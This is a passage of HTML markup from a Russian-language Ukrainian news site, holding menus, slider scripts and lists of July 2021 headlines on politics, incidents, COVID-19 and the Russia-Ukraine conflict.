				</ul>
			</li>
								
							<li><a href="https://enovosty.com/politika">Политика</a></li>							<li><a href="https://enovosty.com/ekonomika">Экономика</a></li>							<li><a href="https://enovosty.com/finance">Финансы</a></li>							<li><a href="https://enovosty.com/markets">Рынки</a></li>							<li><a href="https://enovosty.com/world">Мир</a></li>							<li><a href="https://enovosty.com/society">Общество</a></li>							<li><a href="https://enovosty.com/tehnologii">Технологии</a></li>							<li><a href="https://enovosty.com/auto">Авто</a></li>						
			
			<li ><a href="https://enovosty.com/person">Досье</a></li>
			<li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li>
			<li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;">
				<a href="#">Ещё...</a>	
				<ul class="sub-menu">
										<li ><a href="https://enovosty.com/blogs">Мнения</a></li>
					<li><a href="https://enovosty.com/o-proekte">О проекте</a></li>
					<li><a href="https://enovosty.com/author">Авторы</a></li>
															<li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li>
					<li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li>
					<li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li>
									</ul>
			</li>
			<li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li>
			<li id="menu-item-4513417" ><a href="https://enovosty.com/tag/COVID-19">COVID-19</a></li>
			
						</ul>
</div> 

<script>

jQuery(document).ready(function($){
	if(jQuery( window ).width() < 606){
		var touchHover = function() {
		$('.first').click(function(e){
			e.preventDefault();
			var $this = $(this);
			var onHover = $this.attr('data-hover');
			var linkHref = $this.attr('href');
			if (linkHref && $this.hasClass(onHover)) {
				location.href = linkHref;
				return false;
			}
			$this.toggleClass(onHover);
		});
		
		$('.finance').click(function(e){
			e.preventDefault();
			var $this = $(this);
			var onHover = $this.attr('data-hover');
			var linkHref = $this.attr('href');
			if (linkHref && $this.hasClass(onHover)) {
				location.href = linkHref;
				return false;
			}
			$this.toggleClass(onHover);
		});
		};

		$(document).ready(function() { touchHover(); });
	}

}); 

</script>			
			            	</div><!-- header-->
	             <!-- end header -->
	     


<div id="body">
	
		<div class="cls"></div>
<div id="sidebarLeft_n" style="width:210px;">		<script>
			jQuery(document).ready(function($){
				$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
								});
			});
		</script>
		<div class="topnews_single slide">
			<p style="padding: 0 7px;
			font-weight: 700;
			font-family: arial,verdana,tahoma;
			background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
			line-height: 9px;
			margin: 2px 0 9px;
			text-align: center;">
			<a href="https://enovosty.com/top-news">
			<span style="background-color: #fff;
				font-size: 12px;
				color: #326698;
				text-transform: uppercase;
				padding: 0 9px;">
			Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p>
			<ul id="slider">
				<li><ul class="tact">						<li  id="li0" style="width:210px;">
															<a href="https://enovosty.com/news/news_politics/full/507-rossiya-gotovitsya-atakovat-ukrainu-butusov" title="Россия готовится атаковать Украину, - Бутусов">
									<img width="210" height="156" alt="Россия готовится атаковать Украину, - Бутусов" src="https://enovosty.com/wp-content/uploads/2021/07/4c33dc6-57-main.jpg">
																	</a>
																					<a href="https://enovosty.com/news/news_politics/full/507-rossiya-gotovitsya-atakovat-ukrainu-butusov" title="Россия готовится атаковать Украину, - Бутусов" class="name">
								Россия готовится атаковать Украину, - Бутусов <span>(6476)</span>							</a>	
						</li>	
						</ul></li><li><ul class="tact">						<li  id="li1" style="width:210px;">
															<a href="https://enovosty.com/news/news_incidents/full/407-potop-v-okkupirovannom-krymu-reki-vyshli-iz-beregov-video" title="Потоп в оккупированном Крыму: реки вышли из берегов (ВИДЕО)">
									<img width="210" height="156" alt="Потоп в оккупированном Крыму: реки вышли из берегов (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2021/07/c27f1bc2303f3bf0ae11b78449361ce8.jpg">
																	</a>
																					<a href="https://enovosty.com/news/news_incidents/full/407-potop-v-okkupirovannom-krymu-reki-vyshli-iz-beregov-video" title="Потоп в оккупированном Крыму: реки вышли из берегов (ВИДЕО)" class="name">
								Потоп в оккупированном Крыму: реки вышли из берегов (ВИДЕО) <span>(5712)</span>							</a>	
						</li>	
						</ul></li><li><ul class="tact">						<li  id="li2" style="width:210px;">
															<a href="https://enovosty.com/news/news_society/full/407-sravnivat-armiyu-rossii-s-nato-vse-ravno-chto-sravnivat-zaporozhec-i-tesla-kapitan-vms-ssha" title="Сравнивать армию России с НАТО – все равно что сравнивать Запорожец и Tesla, - капитан ВМС США">
									<img width="210" height="156" alt="Сравнивать армию России с НАТО – все равно что сравнивать Запорожец и Tesla, - капитан ВМС США" src="https://enovosty.com/wp-content/uploads/2021/07/tabah.jpg">
																	</a>
																					<a href="https://enovosty.com/news/news_society/full/407-sravnivat-armiyu-rossii-s-nato-vse-ravno-chto-sravnivat-zaporozhec-i-tesla-kapitan-vms-ssha" title="Сравнивать армию России с НАТО – все равно что сравнивать Запорожец и Tesla, - капитан ВМС США" class="name">
								"Сравнивать армию России с НАТО – все равно что сравнивать "Запорожец" и Tesla", - капитан ВМС США <span>(3316)</span>							</a>	
						</li>	
						</ul></li><li><ul class="tact">						<li  id="li3" style="width:210px;">
															<a href="https://enovosty.com/news/news_economy/full/407-ukraina-zayavlyaet-o-shantazhe-so-storony-gazproma-sokrashhayushhego-postavki-gaza-v-evropu" title="Украина заявляет о шантаже со стороны Газпрома, сокращающего поставки газа в Европу">
									<img width="210" height="156" alt="Украина заявляет о шантаже со стороны Газпрома, сокращающего поставки газа в Европу" src="https://enovosty.com/wp-content/uploads/2021/07/gaz.jpg">
																	</a>
																					<a href="https://enovosty.com/news/news_economy/full/407-ukraina-zayavlyaet-o-shantazhe-so-storony-gazproma-sokrashhayushhego-postavki-gaza-v-evropu" title="Украина заявляет о шантаже со стороны Газпрома, сокращающего поставки газа в Европу" class="name">
								Украина заявляет о "шантаже" со стороны Газпрома, сокращающего поставки газа в Европу <span>(3060)</span>							</a>	
						</li>	
						</ul></li><li><ul class="tact">						<li  id="li4" style="width:210px;">
															<a href="https://enovosty.com/news/news_society/full/407-korabli-nato-zashli-v-port-odessy" title="Корабли НАТО зашли в порт Одессы">
									<img width="210" height="156" alt="Корабли НАТО зашли в порт Одессы" src="https://enovosty.com/wp-content/uploads/2021/07/picturepicture_162531424030088392353029_46776.jpg">
																	</a>
																					<a href="https://enovosty.com/news/news_society/full/407-korabli-nato-zashli-v-port-odessy" title="Корабли НАТО зашли в порт Одессы" class="name">
								Корабли НАТО зашли в порт Одессы <span>(1380)</span>							</a>	
						</li>	
						</ul></li><li><ul class="tact">						<li  id="li5" style="width:210px;">
															<a href="https://enovosty.com/news/news-auto/full/307-ogromnaya-ochered-dalnobojshhikov-skopilas-na-polsko-ukrainskoj-granice" title="Огромная очередь дальнобойщиков скопилась на польско-украинской границе">
									<img width="210" height="156" alt="Огромная очередь дальнобойщиков скопилась на польско-украинской границе" src="https://enovosty.com/wp-content/uploads/2021/07/granica.jpg">
																	</a>
																					<a href="https://enovosty.com/news/news-auto/full/307-ogromnaya-ochered-dalnobojshhikov-skopilas-na-polsko-ukrainskoj-granice" title="Огромная очередь дальнобойщиков скопилась на польско-украинской границе" class="name">
								Огромная очередь дальнобойщиков скопилась на польско-украинской границе <span>(4251)</span>							</a>	
						</li>	
						</ul></li><li><ul class="tact">						<li  id="li6" style="width:210px;">
															<a href="https://enovosty.com/news/news_society/full/307-stata-izvestna-stoimost-razrabotki-ukrainskogo-beregovogo-raketnogo-kompleksa-neptun" title="Стала известна стоимость разработки украинского берегового ракетного комплекса Нептун">
									<img width="210" height="156" alt="Стала известна стоимость разработки украинского берегового ракетного комплекса Нептун" src="https://enovosty.com/wp-content/uploads/2021/07/8e95f4264ba76286.jpg">
																	</a>
																					<a href="https://enovosty.com/news/news_society/full/307-stata-izvestna-stoimost-razrabotki-ukrainskogo-beregovogo-raketnogo-kompleksa-neptun" title="Стала известна стоимость разработки украинского берегового ракетного комплекса Нептун" class="name">
								Стала известна стоимость разработки украинского берегового ракетного комплекса "Нептун" <span>(5013)</span>							</a>	
						</li>	
						</ul></li>			</ul>
		</div>
			
			<div id="lastvideo" class="slide">
						<script type="text/javascript">
			jQuery(document).ready(function($){
				$('#slidervideo').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false
				});
			});
		</script>
		<p class="head">популярное видео</p>
				<ul id="slidervideo">
					<li><ul class="tact">
			<li >
				<div id="post-4854008" class="postvideo">
											<div class="aimg"><a href="https://enovosty.com/news/news_incidents/full/407-nardep-ot-slugi-naroda-evgenij-bragar-byl-zaderzhan-policiej-v-sostoyanii-narkoticheskogo-opyaneniya-foto"><img width="210" height="131" alt="Нардеп от Слуги народа Евгений Брагар был задержан полицией в состоянии наркотического опьянения. ФОТО" src="/wp-content/uploads/2021/07/screenshot_6-7.png"><span class="stopbg"></span></a></div>
										<div class="title"><a href="https://enovosty.com/news/news_incidents/full/407-nardep-ot-slugi-naroda-evgenij-bragar-byl-zaderzhan-policiej-v-sostoyanii-narkoticheskogo-opyaneniya-foto">Нардеп от "Слуги народа" Евгений Брагар был задержан полицией в состоянии наркотического опьянения. ФОТО</a></div>
				</div>
			</li></ul></li>
						<li><ul class="tact">
			<li >
				<div id="post-4853910" class="postvideo">
											<div class="aimg"><a href="https://enovosty.com/news/news_society/full/307-v-xersonskoj-oblasti-byl-zafiksirovan-smerch-foto"><img width="210" height="131" alt="В Херсонской области был зафиксирован смерч. ФОТО" src="/wp-content/uploads/2021/07/screenshot_13-2.png"><span class="stopbg"></span></a></div>
										<div class="title"><a href="https://enovosty.com/news/news_society/full/307-v-xersonskoj-oblasti-byl-zafiksirovan-smerch-foto">В Херсонской области был зафиксирован смерч. ФОТО</a></div>
				</div>
			</li></ul></li>
						<li><ul class="tact">
			<li >
				<div id="post-4853804" class="postvideo">
											<div class="aimg"><a href="https://enovosty.com/news/news_incidents/full/307-kurez-v-indii-ogromnyj-krokodlil-utroil-nespeshnuyu-progulku-po-ulicam-goroda-video"><img width="210" height="131" alt="Курьез: в Индии огромный крокодил устроил неспешную прогулку по улицам города. ВИДЕО" src="/wp-content/uploads/2021/07/screenshot_14-1.png"><span class="stopbg"></span></a></div>
										<div class="title"><a href="https://enovosty.com/news/news_incidents/full/307-kurez-v-indii-ogromnyj-krokodlil-utroil-nespeshnuyu-progulku-po-ulicam-goroda-video">Курьез: в Индии огромный крокодил устроил неспешную прогулку по улицам города. ВИДЕО</a></div>
				</div>
			</li></ul></li>
						<li><ul class="tact">
			<li style="margin-right:0px;">
				<div id="post-4853980" class="postvideo">
											<div class="aimg"><a href="https://enovosty.com/news/news_abroad/full/407-yaponskie-spasateli-nashli-zhivymi-19-chelovek-v-rajone-sxoda-opolznya-video"><img width="210" height="131" alt="Японские спасатели нашли живыми 19 человек в районе схода оползня" src="/wp-content/uploads/2021/07/00abd94eda61f7a1faf1851521f886a4.jpg"><span class="stopbg"></span></a></div>
										<div class="title"><a href="https://enovosty.com/news/news_abroad/full/407-yaponskie-spasateli-nashli-zhivymi-19-chelovek-v-rajone-sxoda-opolznya-video">Японские спасатели нашли живыми 19 человек в районе схода оползня</a></div>
				</div>
			</li></ul></li>
						<li><ul class="tact">
			<li >
				<div id="post-4853890" class="postvideo">
											<div class="aimg"><a href="https://enovosty.com/news/news_society/full/307-odin-chelovek-pogib-i-shest-postradali-v-dnepre-stolknulis-dve-inormarki-foto-video"><img width="210" height="131" alt="Машину два раза подкинуло в воздухе: в Днепре столкнулись две иномарки. ФОТО. ВИДЕО" src="/wp-content/uploads/2021/07/screenshot_4-5.png"><span class="stopbg"></span></a></div>
										<div class="title"><a href="https://enovosty.com/news/news_society/full/307-odin-chelovek-pogib-i-shest-postradali-v-dnepre-stolknulis-dve-inormarki-foto-video">Машину два раза подкинуло в воздухе: в Днепре столкнулись две иномарки. ФОТО. ВИДЕО</a></div>
				</div>
			</li></ul></li>
						<li><ul class="tact">
			<li >
				<div id="post-4853554" class="postvideo">
											<div class="aimg"><a href="https://enovosty.com/news/news_economy/full/107-eto-ne-rynok-zemli-a-zemelnyj-bazar-goncharenko-video"><img width="210" height="131" alt="Это не рынок земли, а земельный базар, - Гончаренко" src="/wp-content/uploads/2021/07/goncharenko2.jpg"><span class="stopbg"></span></a></div>
										<div class="title"><a href="https://enovosty.com/news/news_economy/full/107-eto-ne-rynok-zemli-a-zemelnyj-bazar-goncharenko-video">Это не рынок земли, а земельный базар, - Гончаренко</a></div>
				</div>
			</li></ul></li>
						<li><ul class="tact">
			<li >
				<div id="post-4853641" class="postvideo">
											<div class="aimg"><a href="https://enovosty.com/news/news_abroad/full/107-na-kurorte-krasnogo-morya-akula-vyprygnula-i-otkusila-pyatku-paraplaneristu-incident-popal-na-video"><img width="210" height="131" alt="На курорте Красного моря акула выпрыгнула из воды и откусила пятку парапланеристу" src="/wp-content/uploads/2021/07/paraplaner.jpg"><span class="stopbg"></span></a></div>
										<div class="title"><a href="https://enovosty.com/news/news_abroad/full/107-na-kurorte-krasnogo-morya-akula-vyprygnula-i-otkusila-pyatku-paraplaneristu-incident-popal-na-video">На курорте Красного моря акула выпрыгнула из воды и откусила пятку парапланеристу</a></div>
				</div>
			</li></ul></li>
					 </ul>
		 <div class="more"><a href="https://enovosty.com/video">Все Видео</a></div>
			</div>
			<div class="wiget simple_line analitika"> 
			<div class="caption">
				<p style="text-transform: uppercase;
				margin: 0;
				padding: 0;
				text-align: left;
				font-size: 12px;
				font-weight: 700;
				font-family: arial,verdana,tahoma;">
				<a href="https://enovosty.com/articles">Аналитика</a></p>
			</div>
							<div class="block">
					<div class="info"><span class="postDate">30.06.2021</span>
											</div>
					<p style="margin-bottom: 3px;
						margin: 0;
						padding: 0;
						text-align: left;
						font-size: 12px;
						font-weight: 700;
						font-family: arial,verdana,tahoma;
					"><a class="postTitle" href="https://enovosty.com/politika/full/3006-itogi-iyunya-strax-i-nenavist-v-chernom-more-vakcinnyj-nacionalizm-i-udar-ukrainy-v-vorota-putina">Итоги июня:  Страх и ненависть в Черном море, вакцинный национализм и удар Украины в ворота Путина</a></p>
											<div class="cblock">
							<a href="https://enovosty.com/politika/full/3006-itogi-iyunya-strax-i-nenavist-v-chernom-more-vakcinnyj-nacionalizm-i-udar-ukrainy-v-vorota-putina"><img width="230" alt="Итоги июня:  Страх и ненависть в Черном море, вакцинный национализм и удар Украины в ворота Путина" src="/wp-content/uploads/2021/06/206743808_4628592253821732_8131727701954728717_n-e1625063220136.jpg"></a>
						</div>
										<span class="postExcerpt"><a href="https://enovosty.com/politika/full/3006-itogi-iyunya-strax-i-nenavist-v-chernom-more-vakcinnyj-nacionalizm-i-udar-ukrainy-v-vorota-putina">В Женеве состоялась первая встреча российского и американского лидеров, в мире начали появляться новые мутации коронавируса, а Украина показала невероятные ...</a></span>
				</div>
							<div class="block">
					<div class="info"><span class="postDate">30.06.2021</span>
											</div>
					<p style="margin-bottom: 3px;
						margin: 0;
						padding: 0;
						text-align: left;
						font-size: 12px;
						font-weight: 700;
						font-family: arial,verdana,tahoma;
					"><a class="postTitle" href="https://enovosty.com/ekonomika/full/3006-tenevye-lobbisty-otrasli-drajvery-rosta-ekonomiki-ne-uchastvuyut-v-napolnenii-byudzheta">Теневые лоббисты: отрасли-драйверы роста экономики не участвуют в наполнении бюджета</a></p>
											<div class="cblock">
							<a href="https://enovosty.com/ekonomika/full/3006-tenevye-lobbisty-otrasli-drajvery-rosta-ekonomiki-ne-uchastvuyut-v-napolnenii-byudzheta"><img width="230" alt="Теневые лоббисты: отрасли-драйверы роста экономики не участвуют в наполнении бюджета" src="/wp-content/uploads/2021/06/agro.png"></a>
						</div>
										<span class="postExcerpt"><a href="https://enovosty.com/ekonomika/full/3006-tenevye-lobbisty-otrasli-drajvery-rosta-ekonomiki-ne-uchastvuyut-v-napolnenii-byudzheta">С подачи одного зарубежного "умника" к некогда авиационной и ракетно-космической Украине приклеилось презрительно-издевательское название "великой аграрной ...</a></span>
				</div>
							<div class="block">
					<div class="info"><span class="postDate">28.06.2021</span>
											</div>
					<p style="margin-bottom: 3px;
						margin: 0;
						padding: 0;
						text-align: left;
						font-size: 12px;
						font-weight: 700;
						font-family: arial,verdana,tahoma;
					"><a class="postTitle" href="https://enovosty.com/politika/full/2806-mozhet-li-povorot-zelenskogo-k-populizmu-spasti-ego-na-sleduyushhix-prezidentskix-vyborax">Может ли поворот Зеленского к популизму спасти его на следующих президентских выборах?</a></p>
											<div class="cblock">
							<a href="https://enovosty.com/politika/full/2806-mozhet-li-povorot-zelenskogo-k-populizmu-spasti-ego-na-sleduyushhix-prezidentskix-vyborax"><img width="230" alt="Может ли поворот Зеленского к популизму спасти его на следующих президентских выборах?" src="/wp-content/uploads/2021/06/zelenskiĭ-2.jpg"></a>
						</div>
										<span class="postExcerpt"><a href="https://enovosty.com/politika/full/2806-mozhet-li-povorot-zelenskogo-k-populizmu-spasti-ego-na-sleduyushhix-prezidentskix-vyborax">Более половины украинцев (57 процентов) рассматривают "деолигархизацию" президента Украины Зеленского либо как популизм, направленный на повышение рейтинга ...</a></span>
				</div>
					</div>
		<div class="wiget simple_line" style="border-color:#D6E5F2;">
			<div class="caption">
						<p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p>
				
		</div>
		<div class='cls'></div><span class='news_date'>05.07.2021 г.</span><br />			<div class="post_news">
			    <span id="post-4854099">
				    <span class="postDate">16:01</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_kiev/full/507-v-kieve-obvalilsya-most-dvizhenie-zablokirovano">В Киеве обвалился мост: движение заблокировано</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854074">
				    <span class="postDate">14:00</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_technology/full/507-novosti-kosmosa-teleskop-hubble-pokazal-dve-gigantskie-galaktiki-foto">Новости космоса: Телескоп Hubble показал две гигантские галактики (ФОТО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854089">
				    <span class="postDate">13:58</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/507-poyavilos-video-potopa-v-rossijskom-sochi-mashiny-pod-vodoj-lyudi-plavayut-po-ulicam-fotovideo">Появилось видео затопления российского Сочи: машины под водой, люди плавают по улицам (ФОТО. ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854077">
				    <span class="postDate">13:40</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news-markets/full/507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy">Россия запретила мороженое, газировку и ячмень из Украины</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854076">
				    <span class="postDate">12:20</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news-culture/full/507-umer-oskaronosnyj-rezhisser-vladimir-menshov">Умер оскароносный режиссер Владимир Меньшов</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854065">
				    <span class="postDate">11:51</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_sport/full/507-anglijskaya-pressa-raskritikovala-strannyj-postupok-yarmolenko-v-matche-evro-2020-video">Английская пресса раскритиковала "странный поступок" Ярмоленко в матче Евро-2020 (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854059">
				    <span class="postDate">11:34</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/zdorove/full/507-nazvany-produkty-sposobnye-ostanovit-starenie-cheloveka">Названы продукты, способные остановить старение человека</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854062">
				    <span class="postDate">11:32</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news-finance/full/507-kakuyu-birzhu-kriptovalyut-vybrat-s-prilozheniem-dlya-iphone-i-android">Какую биржу криптовалют выбрать с приложением для iPhone и Android?</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854055">
				    <span class="postDate">11:25</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/507-gruppa-zloumyshlennikov-planirovala-ukrast-u-gosudarstva-50-ga-lesa-voze-kievskogo-morya-gbr-foto">Кража госземель: ГБР расследует противоправную схему вывода из госсобственности 50 га леса возе Киевского моря (ФОТО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854056">
				    <span class="postDate">11:09</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/507-stolichnyj-taksist-udaril-i-vyshvyrnul-iz-avto-passazhirku-video">Столичный таксист ударил и вышвырнул из авто пассажирку (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854053">
				    <span class="postDate">10:53</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_kiev/full/507-stoit-byt-ostorozhnymi-na-kievskom-plyazhe-zametili-skorpiona-foto">"Стоит быть осторожными": На киевском пляже заметили скорпиона (ФОТО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854048">
				    <span class="postDate">10:42</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_politics/full/507-amerikanskaya-aviaciya-i-voennye-korabli-podderzhali-den-vms-ukrainy-foto">Американская авиация и военные корабли поддержали День ВМС Украины (ФОТО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854047">
				    <span class="postDate">10:41</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_politics/full/507-rossiya-gotovitsya-atakovat-ukrainu-butusov">Россия готовится атаковать Украину, - Бутусов</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854044">
				    <span class="postDate">09:20</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_abroad/full/507-v-kaspijskom-more-proizoshlo-zemletryasenie-gorit-neftedobyvayushhaya-platforma-video">В Каспийском море произошло землетрясение: горит нефтедобывающая платформа (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854043">
				    <span class="postDate">09:15</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/507-ukrainec-umer-posle-vakcinacii-v-pfizer-biontech-otreagirovali">Украинец умер после вакцинации. В Pfizer/BioNTech отреагировали</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854016">
				    <span class="postDate">08:57</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/407-rzhavye-konstrukcii-i-treshhiny-v-asfalte-kak-vyglyadit-avtovokzal-zapadnyj-v-okkupirovannom-donecke-foto">Ржавые конструкции и трещины в асфальте: как выглядит автовокзал "Западный" в оккупированном Донецке. ФОТО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854039">
				    <span class="postDate">08:50</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_abroad/full/507-kandidat-v-prezidenty-estonii-potreboval-ot-rossii-vernut-chast-territorii">Кандидат в президенты Эстонии потребовал от России вернуть часть территории</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853990">
				    <span class="postDate">08:44</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/407-potop-v-okkupirovannom-krymu-reki-vyshli-iz-beregov-video">Потоп в оккупированном Крыму: реки вышли из берегов (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854037">
				    <span class="postDate">08:40</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/507-iz-za-opasnosti-delta-uzhestochili-karantin-kakie-ogranicheniya-segodnya-dejstvuyut">Из-за опасности "Дельта" ужесточили карантин. Какие ограничения сегодня действуют</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854034">
				    <span class="postDate">08:31</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/507-ot-oblomkov-vrazheskogo-snaryada-na-donbasse-pogib-ukrainskij-voennyj-medik">От обломков вражеского снаряда на Донбассе погиб украинский военный медик</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854035">
				    <span class="postDate">08:15</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_abroad/full/507-nazvana-samaya-vakcinirovannaya-strana-mira-bolee-70-poluchili-dve-privivki">Названа самая вакцинированная страна мира: более 70% получили две прививки</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>04.07.2021 г.</span><br />			<div class="post_news">
			    <span id="post-4854028">
				    <span class="postDate">23:23</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/407-kurez-amerikancu-na-schet-po-oshibke-banka-zachislili-50-milliardov-dollarov-foto">Курьез: американцу на счет по ошибке банка зачислили 50 миллиардов долларов. ФОТО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854008">
				    <span class="postDate">18:53</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_incidents/full/407-nardep-ot-slugi-naroda-evgenij-bragar-byl-zaderzhan-policiej-v-sostoyanii-narkoticheskogo-opyaneniya-foto">Нардеп от "Слуги народа" Евгений Брагар был задержан полицией в состоянии наркотического опьянения. ФОТО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4854001">
				    <span class="postDate">18:39</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_sport/full/407-ukrainskie-bolelshhiki-vstretili-sbornuyu-ukrainy-po-futbolu-v-borispole-foto">Украинские болельщики встретили сборную Украины по футболу в "Борисполе". ФОТО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853993">
				    <span class="postDate">17:38</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news-auto/full/407-kontrabandnye-roskoshnye-avtomobili-stoimostyu-900-000-funtov-sterlingov-unichtozheny-ekskavatorom-fotoreportazh">Контрабандные роскошные автомобили стоимостью 900 000 фунтов стерлингов уничтожены экскаватором (ФОТОрепортаж)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853910">
				    <span class="postDate">13:25</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/307-v-xersonskoj-oblasti-byl-zafiksirovan-smerch-foto">В Херсонской области был зафиксирован смерч. ФОТО</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853988">
				    <span class="postDate">11:30</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/407-sravnivat-armiyu-rossii-s-nato-vse-ravno-chto-sravnivat-zaporozhec-i-tesla-kapitan-vms-ssha">"Сравнивать армию России с НАТО – все равно что сравнивать "Запорожец" и Tesla", - капитан ВМС США</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853987">
				    <span class="postDate">11:22</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_abroad/full/407-singapurskij-samolet-ekstrenno-sel-v-rossii-iz-za-insulta-u-styuarda">Сингапурский самолет экстренно сел в России из-за инсульта у стюарда</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853985">
				    <span class="postDate">10:41</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_economy/full/407-ukraina-zayavlyaet-o-shantazhe-so-storony-gazproma-sokrashhayushhego-postavki-gaza-v-evropu">Украина заявляет о "шантаже" со стороны Газпрома, сокращающего поставки газа в Европу</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853982">
				    <span class="postDate">09:50</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/407-v-kieve-uvolili-uchitelnicu-kotoraya-izbila-shkolnika-s-autizmom-video">В Киеве уволили учительницу, которая избила школьника с аутизмом (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853980">
				    <span class="postDate">09:40</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_abroad/full/407-yaponskie-spasateli-nashli-zhivymi-19-chelovek-v-rajone-sxoda-opolznya-video">Японские спасатели нашли живыми 19 человек в районе схода оползня (ВИДЕО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
					<div class="post_news">
			    <span id="post-4853974">
				    <span class="postDate">09:09</span>
				    				    	<a class="postTitle" href="https://enovosty.com/news/news_society/full/407-korabli-nato-zashli-v-port-odessy">Корабли НАТО зашли в порт Одессы</a><br />
				    			    </span>
				<div class="postFields"></div>
